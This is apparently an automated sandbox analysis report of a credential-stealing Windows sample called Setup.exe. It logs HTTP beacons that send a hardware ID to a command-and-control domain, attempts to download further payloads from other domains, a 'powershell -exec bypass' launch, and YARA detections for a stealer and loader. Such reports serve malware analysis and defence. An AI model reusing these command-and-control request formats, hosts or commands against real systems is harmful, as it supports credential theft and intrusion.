2024-12-23 23:43:24 UTC	15331	OUT	Data Raw: 2d 2d 42 53 48 58 57 36 37 35 59 56 38 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 44 39 45 36 44 32 37 43 44 33 32 37 37 42 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 42 53 48 58 57 36 37 35 59 56 38 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 53 48 58 57 36 37 35 59 56 38 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 42 53 48 58 57 36 37 35 59 56 38 55 0d 0a 43 6f Data Ascii: --BSHXW675YV8UContent-Disposition: form-data; name="hwid"F6D9E6D27CD3277B9546E64A28D3FD49--BSHXW675YV8UContent-Disposition: form-data; name="pid"3--BSHXW675YV8UContent-Disposition: form-data; name="lid"hRjzG3--DNO--BSHXW675YV8UCo
2024-12-23 23:43:24 UTC	5068	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-23 23:43:25 UTC	1132	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 23:43:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6m3t3m6qh6ai2rkn5sj2g7a6im; expires=Fri, 18 Apr 2025 17:30:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2FhrrMMt1Wuq8a0lAJ60pwdVtayDX25Qj7Y5zzVTUBzwohBhVhfnCefYZ1B4UmBUhXruxse9PUrYYDGYNLSU3ykS%2FQNBtSYK5ERXf%2B3lxpThMBlhP6FYTGPl59USwePKQliMIvc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c36b09c884216-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1616&rtt_var=613&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21357&delivery_rate=1806930&cwnd=250&unsent_bytes=0&cid=e88365cc8b0914cd&ts=1245&x=0"
2024-12-23 23:43:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 23:43:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49739	104.21.58.45	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:27 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4T7B0C22ADZX6G User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1217 Host: moanungsnake.click
2024-12-23 23:43:27 UTC	1217	OUT	Data Raw: 2d 2d 34 54 37 42 30 43 32 32 41 44 5a 58 36 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 44 39 45 36 44 32 37 43 44 33 32 37 37 42 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 34 54 37 42 30 43 32 32 41 44 5a 58 36 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 54 37 42 30 43 32 32 41 44 5a 58 36 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 34 54 37 42 30 43 32 32 41 44 Data Ascii: --4T7B0C22ADZX6GContent-Disposition: form-data; name="hwid"F6D9E6D27CD3277B9546E64A28D3FD49--4T7B0C22ADZX6GContent-Disposition: form-data; name="pid"1--4T7B0C22ADZX6GContent-Disposition: form-data; name="lid"hRjzG3--DNO--4T7B0C22AD
2024-12-23 23:43:28 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 23:43:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g1b3o2gqu9rn5rt65sbq10lo5j; expires=Fri, 18 Apr 2025 17:30:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TH3WXq2P7mgHAGn8tsfDwj9e8pxYalgRQIGW4mHDfvzKFiQtc%2BMdkpfY4Q%2BaaI%2BJMmpsx6e9HYe7E16AZR3s61znPNJNzo0%2BqYbmyUDq4SY9qtHc9EEgqlht9yFHu3kaeYCdsXA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c36c3196f4204-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1607&rtt_var=617&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2132&delivery_rate=1751649&cwnd=234&unsent_bytes=0&cid=85838d557c70b4cf&ts=1053&x=0"
2024-12-23 23:43:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 23:43:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.58.45	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:29 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PLKUFZZIHC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1066 Host: moanungsnake.click
2024-12-23 23:43:29 UTC	1066	OUT	Data Raw: 2d 2d 50 4c 4b 55 46 5a 5a 49 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 44 39 45 36 44 32 37 43 44 33 32 37 37 42 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 50 4c 4b 55 46 5a 5a 49 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 4c 4b 55 46 5a 5a 49 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 50 4c 4b 55 46 5a 5a 49 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --PLKUFZZIHCContent-Disposition: form-data; name="hwid"F6D9E6D27CD3277B9546E64A28D3FD49--PLKUFZZIHCContent-Disposition: form-data; name="pid"1--PLKUFZZIHCContent-Disposition: form-data; name="lid"hRjzG3--DNO--PLKUFZZIHCContent-Di
2024-12-23 23:43:30 UTC	1137	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 23:43:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=73s1okfggl9paroggpfcnbqicj; expires=Fri, 18 Apr 2025 17:30:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vQEy47F%2FdBSEv%2B7bNJ%2BHwsJXdyQF4MqBr3YXNbl%2FzikNPcGDvEeYNQmfn8uK6xooJFin3CWXwWA%2BIZAJ456ohZhG06h30Fyr4nMgrHG4flpouwYR2NGJXMXhn%2FkO4skO1a%2BPfiA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c36d1dcd54362-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1738&rtt_var=665&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1977&delivery_rate=1630374&cwnd=250&unsent_bytes=0&cid=8076ee1218832a2a&ts=1128&x=0"
2024-12-23 23:43:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 23:43:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	104.21.58.45	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:31 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 112 Host: moanungsnake.click
2024-12-23 23:43:31 UTC	112	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 46 36 44 39 45 36 44 32 37 43 44 33 32 37 37 42 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=F6D9E6D27CD3277B9546E64A28D3FD49
2024-12-23 23:43:32 UTC	1137	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 23:43:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fdchua8auq6e15b4o7qdg7a7je; expires=Fri, 18 Apr 2025 17:30:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ho41Wj%2BVdYdARhEhBoIWWLNGwfePck5tj%2FD%2Bn6ONYUQs8EMQjG5LN5aYRNENU%2Frtyo0WspxHGRQdc4n8Gh%2FiOquVJJ38NkMWhM9%2Fuct%2BWjMoonvgVrJw3VxcnzN4Kn4l3RKuWw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c36e14f29c3f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1523&min_rtt=1520&rtt_var=577&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1015&delivery_rate=1886304&cwnd=190&unsent_bytes=0&cid=44eb9e19cdb90aec&ts=1072&x=0"
2024-12-23 23:43:32 UTC	218	IN	Data Raw: 64 34 0d 0a 4f 55 33 73 6f 2b 46 39 45 54 66 65 66 4e 78 54 75 69 75 6c 69 45 31 65 4e 6a 5a 2f 79 70 2f 47 36 4b 68 51 44 62 53 2b 30 79 4a 69 4e 73 37 57 77 30 63 7a 58 36 6f 49 72 43 43 41 64 34 72 55 59 6a 42 54 52 78 62 6b 37 4b 36 48 32 41 77 69 78 39 71 30 53 45 41 34 6d 50 2f 4f 44 57 4a 66 38 41 69 6b 4a 35 67 48 68 2b 34 35 66 41 77 45 55 2b 6a 36 35 4e 4b 5a 4c 53 48 50 6e 4b 59 41 41 32 2b 45 31 35 55 4e 59 67 32 43 55 34 42 38 30 55 66 4d 2b 44 6b 33 54 45 64 52 75 66 65 70 6d 50 52 2f 5a 4e 72 4b 6a 45 46 56 50 62 50 50 68 51 39 4f 52 4c 59 64 38 69 66 43 58 34 65 6b 62 7a 68 43 46 45 58 34 73 2b 53 4e 69 6d 6f 38 79 65 4d 3d 0d 0a Data Ascii: d4OU3so+F9ETfefNxTuiuliE1eNjZ/yp/G6KhQDbS+0yJiNs7Ww0czX6oIrCCAd4rUYjBTRxbk7K6H2Awix9q0SEA4mP/ODWJf8AikJ5gHh+45fAwEU+j65NKZLSHPnKYAA2+E15UNYg2CU4B80UfM+Dk3TEdRufepmPR/ZNrKjEFVPbPPhQ9ORLYd8ifCX4ekbzhCFEX4s+SNimo8yeM=
2024-12-23 23:43:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	104.21.27.229	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:34 UTC	199	OUT	GET /sdgjyut/psh.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: neqi.shop
2024-12-23 23:43:37 UTC	943	IN	HTTP/1.1 523 Date: Mon, 23 Dec 2024 23:43:37 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Edk1p4fiH70uYAOWJbSoaupaOmDdnJaFMw7jcQuYRjj8tulIY5WuRDmHaeEynuPRDyPFJl5IpdyfpW8b7P4g7UoShZACK2q8%2BqIrHqBggaTeZPJFY%2FZi56VG%2Fe0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8f6c36f0c93b9e08-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1825&rtt_var=688&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=813&delivery_rate=1585233&cwnd=163&unsent_bytes=0&cid=9f98d09b5994296c&ts=3371&x=0"
2024-12-23 23:43:37 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33 Data Ascii: error code: 523

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	104.21.84.113	443	7036	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 23:43:38 UTC	207	OUT	GET /int_clp_ldr_sha.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: kliptizq.shop
2024-12-23 23:43:39 UTC	550	IN	HTTP/1.1 403 Forbidden Date: Mon, 23 Dec 2024 23:43:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1lWkEFCWSI09o21y9oD48gwVIeB8U1x4T1BEbFUnWgvQfjtTtUgr1x3Db%2BwRhz0QYKJgm57SYKuYKeJmA7xNdNRbQeI1DF6%2Fbme%2FXAx998uitCL5Sg8%2BlUX0vMn3W4i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c370e5b60c43b-EWR
2024-12-23 23:43:39 UTC	819	IN	Data Raw: 31 31 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-12-23 23:43:39 UTC	1369	IN	Data Raw: 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 Data Ascii: f.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cooki
2024-12-23 23:43:39 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn
2024-12-23 23:43:39 UTC	1015	IN	Data Raw: 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 Data Ascii: al" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><sp
2024-12-23 23:43:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	18:43:03
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup.exe"
Imagebase:	0x400000
File size:	82'950'266 bytes
MD5 hash:	CD7E85C71B3D9A273BCB5F3B3D8F51D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1940166955.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4130165684.0000000000F80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1891443494.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	18:43:36
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass error code: 523
Imagebase:	0xe00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:43:36
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	65.7%
Signature Coverage:	53.1%
Total number of Nodes:	254
Total number of Limit Nodes:	33

Executed Functions

Function 032059F0 Relevance: 28.7, APIs: 9, Strings: 7, Instructions: 656
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.COMBASE(0320F68C,00000000,00000001,0320F67C), ref: 03205C1F
SysAllocString.OLEAUT32(C41CC213), ref: 03205C98
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 03205CD5
SysAllocString.OLEAUT32(99299721), ref: 03205D35
SysAllocString.OLEAUT32(C98DC775), ref: 03205DE6
VariantInit.OLEAUT32(DMNO), ref: 03205E52
VariantClear.OLEAUT32(?), ref: 03205FD5
SysFreeString.OLEAUT32(00000000), ref: 03206010
GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0320604B

Strings

V7~9, xrefs: 03205D5F
R3^5, xrefs: 03205D57
x%, xrefs: 03205B83
DMNO, xrefs: 03205A48, 03205AF1
s?@!, xrefs: 03205D6F
7(, xrefs: 03205E90
`abc, xrefs: 03206136

Memory Dump Source

Source File: 00000000.00000002.4131856647.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31d1000_Setup.jbxd

Similarity

API ID: String$Alloc$Variant$BlanketClearCreateFreeInformationInitInstanceProxyVolume
String ID: 7($DMNO$R3^5$V7~9$`abc$s?@!$x%
API String ID: 3897708192-1090096584
Opcode ID: 7ea65bfcc7a380b178b2477060a51c9d078b226952b1d2aa6aeca5e15af333ab
Instruction ID: ce4ddf99c178d2243f9055d747f9eab1e075c4af8946b16d9e5e799d281ae523
Opcode Fuzzy Hash: 7ea65bfcc7a380b178b2477060a51c9d078b226952b1d2aa6aeca5e15af333ab
Instruction Fuzzy Hash: 682204726583019FD314DF29C884B5BBBE6EFC6314F28892CF5948B292D778D849CB52

Function 03205670 Relevance: 15.3, Strings: 12, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L, xrefs: 032057FE
I, xrefs: 03205925
L, xrefs: 03205704
